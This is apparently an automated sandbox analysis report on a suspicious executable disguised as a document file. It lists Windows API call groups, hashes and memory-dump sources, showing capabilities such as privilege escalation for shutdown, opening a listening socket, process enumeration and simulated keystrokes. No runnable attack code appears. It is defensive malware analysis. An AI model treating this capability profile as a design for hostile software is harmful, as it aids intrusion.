                                                        • Instruction Fuzzy Hash: 4641817190460AEFCF65DFA4CC59AEE7BB4FF05310F108456E816A2192E7389E95CF90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                        • API String ID: 0-1546025612
                                                        • Opcode ID: 8479064daa59d51d9fcf5a41986887b2168ffd36fd3b1e2da51765249ead4978
                                                        • Instruction ID: 5ec956d1c1b937ee2a272d8c82fedb472ce96005d7ccc04f12fcb6e23cfdc8f4
                                                        • Opcode Fuzzy Hash: 8479064daa59d51d9fcf5a41986887b2168ffd36fd3b1e2da51765249ead4978
                                                        • Instruction Fuzzy Hash: 2A926A71E0021A8BDF25CF58D8507EDB7B1BB54314F2481AAE919AB2C0E7789DC2DB91
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 1462a88d6d704824c80f99204bf3778d4049f8a964a798a145414f7e865822a0
                                                        • Instruction ID: ff0ab519a84654eaac68afc205e1b24ab860d4c1e5ccdfe41a105c01f3cc30b6
                                                        • Opcode Fuzzy Hash: 1462a88d6d704824c80f99204bf3778d4049f8a964a798a145414f7e865822a0
                                                        • Instruction Fuzzy Hash: 7C129C70A00609DFDF04DFA8D985AEEB7F5FF48300F208529E406E7291EB39A951CB65
                                                        APIs
                                                          • Part of subcall function 0074BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0074BF0F
                                                          • Part of subcall function 0074BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0074BF3C
                                                          • Part of subcall function 0074BEC3: GetLastError.KERNEL32 ref: 0074BF49
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 0075830C
                                                        Strings
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-194228
                                                        • Opcode ID: 1d4a32cf4149338fd0c3dc4c7b8693aab90c1aaa8cf92e0f2d7146378df96097
                                                        • Instruction ID: f602dead502824409f90cc30ece279c97b6acd4182677a514d5fae23b53c1b07
                                                        • Opcode Fuzzy Hash: 1d4a32cf4149338fd0c3dc4c7b8693aab90c1aaa8cf92e0f2d7146378df96097
                                                        • Instruction Fuzzy Hash: 53018471B44215ABE7A85678CC4EBFF7658AB00B82F140425FD43F20D1DFEC9C0981A5
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00769235
                                                        • WSAGetLastError.WS2_32(00000000), ref: 00769244
                                                        • bind.WS2_32(00000000,?,00000010), ref: 00769260
                                                        • listen.WS2_32(00000000,00000005), ref: 0076926F
                                                        • WSAGetLastError.WS2_32(00000000), ref: 00769289
                                                        • closesocket.WS2_32(00000000), ref: 0076929D
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                        • String ID:
                                                        • API String ID: 1279440585-0
                                                        • Opcode ID: f9ae9dbc76147bd80e7f031b07085a1e128975ce90cfcf826b5e132b6132c5b7
                                                        • Instruction ID: 820a31f68de90e743d1ecb85c7363f48b2d9a714407d784796b634bf65b72577
                                                        • Opcode Fuzzy Hash: f9ae9dbc76147bd80e7f031b07085a1e128975ce90cfcf826b5e132b6132c5b7
                                                        • Instruction Fuzzy Hash: EA21A231600200EFCB10EF64D959B6EB7A9FF48324F108159F957A72D1C778AD42CB51
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00756F7D
                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00756F8D
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00756FAC
                                                        • __wsplitpath.LIBCMT ref: 00756FD0
                                                        • _wcscat.LIBCMT ref: 00756FE3
                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00757022
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                        • String ID:
                                                        • API String ID: 1605983538-0
                                                        • Opcode ID: ede964e3fdc67226a15c5eb3f2b505c78c1e922164ff4171156f4d0e48a72b3c
                                                        • Instruction ID: b847f6c351c0c044003bd24319611e0cb7211f03bcf87316184bb5bd44f90354
                                                        • Opcode Fuzzy Hash: ede964e3fdc67226a15c5eb3f2b505c78c1e922164ff4171156f4d0e48a72b3c
                                                        • Instruction Fuzzy Hash: 99216871904218EBDB20AB94DC89BEEB7FCAB48311F5004A5F945D3141E7B99F85CB60
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: hN|$tM|
                                                        • API String ID: 4104443479-1284067220
                                                        • Opcode ID: fff6444839c41ec4e22658f3ea3d51c218407161f6df746bfe5f2d924ce0830f
                                                        • Instruction ID: fb6f5b2ea7d47d8d57a018a0f4a87cd0a977f8fafcbdc92717449eefbf6d0025
                                                        • Opcode Fuzzy Hash: fff6444839c41ec4e22658f3ea3d51c218407161f6df746bfe5f2d924ce0830f
                                                        • Instruction Fuzzy Hash: 5FA23975E00219DFCF28CF58D4806EDBBB1BF48314F2581AAD859AB391D7389E81DB90
                                                        APIs
                                                          • Part of subcall function 0073010A: std::exception::exception.LIBCMT ref: 0073013E
                                                          • Part of subcall function 0073010A: __CxxThrowException@8.LIBCMT ref: 00730153
                                                        • _memmove.LIBCMT ref: 00783020
                                                        • _memmove.LIBCMT ref: 00783135
                                                        • _memmove.LIBCMT ref: 007831DC
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1300846289-0
                                                        • Opcode ID: a11b8e5ee04eec29d03f77594ecf139e0cf9b7a4a73526a9b763d8a89e8a1b6a
                                                        • Instruction ID: 9e27f86de3b0218dfcdd2ba64dbbf344d7019137319c00f833b3a7e8cc9d1a65
                                                        • Opcode Fuzzy Hash: a11b8e5ee04eec29d03f77594ecf139e0cf9b7a4a73526a9b763d8a89e8a1b6a
                                                        • Instruction Fuzzy Hash: 6702A270A00209EFDF04DF68D885AAE77B5FF48700F148069E806DB296EB39DE55CB95
                                                        APIs
                                                          • Part of subcall function 0076ACD3: inet_addr.WS2_32(00000000), ref: 0076ACF5
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0076973D
                                                        • WSAGetLastError.WS2_32(00000000,00000000), ref: 00769760
                                                        Similarity
                                                        • API ID: ErrorLastinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 4170576061-0
                                                        • Opcode ID: 21c08bab80342f3fb1dfec3f611038ace9ebfe78176f459c51b36282016c2d08
                                                        • Instruction ID: ad71e2fce61b5d4b1489ca8db1eaaca770b269e3436ab26239cc7f7327fb6dec
                                                        • Opcode Fuzzy Hash: 21c08bab80342f3fb1dfec3f611038ace9ebfe78176f459c51b36282016c2d08
                                                        • Instruction Fuzzy Hash: 4841C770600110EFDB10AF68CC56E6E77EDEF48724F148059F956AB3D2DB78AE418B91
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0075F37A
                                                        • _wcscmp.LIBCMT ref: 0075F3AA
                                                        • _wcscmp.LIBCMT ref: 0075F3BF
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0075F3D0
                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0075F3FE
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 2387731787-0
                                                        • Opcode ID: 5f3d53c0e965c52725d1826ea248996161a7f822d54fa72906cae813067d7c78
                                                        • Instruction ID: 6f4265282b373a36369ea38003ed57de2825ebdd232a4291009f2bd122f28122
                                                        • Opcode Fuzzy Hash: 5f3d53c0e965c52725d1826ea248996161a7f822d54fa72906cae813067d7c78
                                                        • Instruction Fuzzy Hash: 3441AC75604301DFC718DF28C494A9AB3E4FF49324F10816DE95A8B3A2DB79AD49CB91
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 0075439C
                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 007543B8
                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00754425
                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00754483
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: b540ab9bfb4ca6e63ab412fc5709541b5e31acc67ece8aa4a8e46b64a212b417
                                                        • Instruction ID: 16222ed3aa6889b4a71794216ab66b15f22b113b7abce69578f9680f2e10ecef
                                                        • Opcode Fuzzy Hash: b540ab9bfb4ca6e63ab412fc5709541b5e31acc67ece8aa4a8e46b64a212b417
                                                        • Instruction Fuzzy Hash: 904106B0D44288AAEF348B6498087FD7BB5AB4531BF04011AE881932D1C7FC8DDD9765
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • GetCursorPos.USER32(?), ref: 0077EFE2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0078F3C3,?,?,?,?,?), ref: 0077EFF7
                                                        • GetCursorPos.USER32(?), ref: 0077F041
                                                        • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0078F3C3,?,?,?), ref: 0077F077
                                                        Similarity
                                                        • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                        • String ID:
                                                        • API String ID: 1423138444-0
                                                        • Opcode ID: 6cca792c8040ff76f1cf81e1f46d5af40d433dd0314686b6c31ae6745558202e
                                                        • Instruction ID: 3be78475cc21b4311f17f5be0cf306464183cac0df753ef5aa8ee859f9711e2b
                                                        • Opcode Fuzzy Hash: 6cca792c8040ff76f1cf81e1f46d5af40d433dd0314686b6c31ae6745558202e
                                                        • Instruction Fuzzy Hash: 0221B135600118FFCF258F54DC98EEA7BB5EB497A4F448069F909473A2C3399D61EBA0
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: G-q
                                                        • API String ID: 0-2377931026
                                                        • Opcode ID: f4507e89bcb7e970c3a8e380cea039d6998c7f17593afdd8bb45603d7a52d699
                                                        • Instruction ID: fde02c1b9dd65988f0015eb3dfb08a3a82ca7150cd6f525e787e7465d4973d49
                                                        • Opcode Fuzzy Hash: f4507e89bcb7e970c3a8e380cea039d6998c7f17593afdd8bb45603d7a52d699
                                                        • Instruction Fuzzy Hash: A122AE71A00209DFDB24DF58C494AEAB7F1FF18300F148069E8569B391E779ADC5CB91
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0075221E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: ($|
                                                        • API String ID: 1659193697-1631851259
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0072AE5E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Similarity
                                                        • API ID: DialogLongNtdllProc_Window
                                                        • String ID:
                                                        • API String ID: 2065330234-0
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00764A1E,00000000), ref: 007655FD
                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00765629
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Similarity
                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                        • String ID:
                                                        • API String ID: 599397726-0
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0075EA95
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0075EAEF
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0075EB3C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0075704C
                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0075708D
                                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00757098
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                        • String ID:
                                                        • API String ID: 33631002-0
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                          • Part of subcall function 0072B155: GetWindowLongW.USER32(?,000000EB), ref: 0072B166
                                                        • GetParent.USER32(?), ref: 0078F4B5
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0072ADDD,?,?,?,00000006,?), ref: 0078F52F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Similarity
                                                        • API ID: LongWindow$DialogNtdllParentProc_
                                                        • String ID:
                                                        • API String ID: 314495775-0
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0075FD71
                                                        • FindClose.KERNEL32(00000000), ref: 0075FDA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0078F352,?,?,?), ref: 0077F115
                                                          • Part of subcall function 0072B155: GetWindowLongW.USER32(?,000000EB), ref: 0072B166
                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0077F0FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Similarity
                                                        • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                        • String ID:
                                                        • API String ID: 1273190321-0
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 0077F47D
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0078F42E,?,?,?,?,?), ref: 0077F4A6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Similarity
                                                        • API ID: ClientDialogNtdllProc_Screen
                                                        • String ID:
                                                        • API String ID: 3420055661-0
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0076C2E2,?,?,00000000,?), ref: 0075D73F
                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0076C2E2,?,?,00000000,?), ref: 0075D751
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        APIs
                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00754B89
                                                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00754B9C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        Similarity
                                                        • API ID: InputSendkeybd_event
                                                        • String ID:
                                                        • API String ID: 3536248340-0
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0074B9EC), ref: 0074B8C5
                                                        • CloseHandle.KERNEL32(?,?,0074B9EC), ref: 0074B8D7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: d7477f593f03bece717a57f79df89c8d7272f373aee3d467641aebe0a360d08c
                                                        • Instruction ID: 49ea79a2b51424d3c6388c0ab9dbab8c7f677b2595ad57fa28a6fee3cf57169c
                                                        • Opcode Fuzzy Hash: d7477f593f03bece717a57f79df89c8d7272f373aee3d467641aebe0a360d08c
                                                        • Instruction Fuzzy Hash: E3E0B672004611EEE7362B64EC09EB6BBEDEF04311B11C82AF59681471DB66AC91DB50
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0077F59C
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0078F3AD,?,?,?,?), ref: 0077F5C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DialogLongNtdllProc_Window
                                                        • String ID:
                                                        • API String ID: 2065330234-0
                                                        • Opcode ID: 58ae72a752ca4f61e566835a916372d6e19d1b52ed91ac9a9b821e2cca13764e
                                                        • Instruction ID: 2ebf54a9ebd043808a7b7f5ab51d4f9115ef6143a832d9c7c872452856259559
                                                        • Opcode Fuzzy Hash: 58ae72a752ca4f61e566835a916372d6e19d1b52ed91ac9a9b821e2cca13764e
                                                        • Instruction Fuzzy Hash: B5E08C30104219BBEB240F09DD0AFB93B18EB00B90F10C526F91A880E0D7B888A1D664
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0071125D,00737A43,00710F35,?,?,00000001), ref: 00738E41
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00738E4A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 7592c6fdfa1f8e8909f1f527733a6450d6a6339c6c6664c92995df50550d1999
                                                        • Instruction ID: 84a4e863ba457dfa205f58d02949ef4c6014760767f9422db0eb8acd2654d826
                                                        • Opcode Fuzzy Hash: 7592c6fdfa1f8e8909f1f527733a6450d6a6339c6c6664c92995df50550d1999
                                                        • Instruction Fuzzy Hash: 11B09271044A08EBEA102BB1EC09B883F68EB0AA63F008012F61D442608B6758528A9A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID:
                                                        • API String ID: 3964851224-0
                                                        • Opcode ID: f9e5f676fa9be41776f4e24ef96298acf737d9151fbd3dae0d0222c9fee7c08b
                                                        • Instruction ID: 4d6b96b50768a57d605dc1b74fad66fab061b050bbbf43d4ba7372dd27aa7ab9
                                                        • Opcode Fuzzy Hash: f9e5f676fa9be41776f4e24ef96298acf737d9151fbd3dae0d0222c9fee7c08b
                                                        • Instruction Fuzzy Hash: 7E927970608351DFD724DF18D484B6AB7F1BF88304F14885EE98A8B2A2D779ED85CB52
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c7a92c5c9d6197b43a6fc01ebcca310d6540041a1a0ae5cd8dfb4f83142d5d56
                                                        • Instruction ID: 4113cc3ca314d527a3c28f33e7ca928a0372a27afc73d10766dfe4692417f5ee
                                                        • Opcode Fuzzy Hash: c7a92c5c9d6197b43a6fc01ebcca310d6540041a1a0ae5cd8dfb4f83142d5d56
                                                        • Instruction Fuzzy Hash: 9AB1E120E2AF404DD62396398831337B65CAFFB2D5F92D71BFC2A74D22EB2585834184
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00780352
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DialogLongNtdllProc_Window
                                                        • String ID:
                                                        • API String ID: 2065330234-0
                                                        • Opcode ID: 8318ff762e52ac5edc3de040440770489e8dfdb60c3bc0b1b5a2b7234e6f7375
                                                        • Instruction ID: 81e6076d47f0e5ac99f6b6ba43d5a0877be6f548c84d2a8389786fe4f0edf613
                                                        • Opcode Fuzzy Hash: 8318ff762e52ac5edc3de040440770489e8dfdb60c3bc0b1b5a2b7234e6f7375
                                                        • Instruction Fuzzy Hash: 18112731284255FFEB656B28CC49F793B24EB41760F248319F9215A5E2CAAC8D04D3E9
                                                        APIs
                                                          • Part of subcall function 0072B155: GetWindowLongW.USER32(?,000000EB), ref: 0072B166
                                                        • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 0077E7AF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
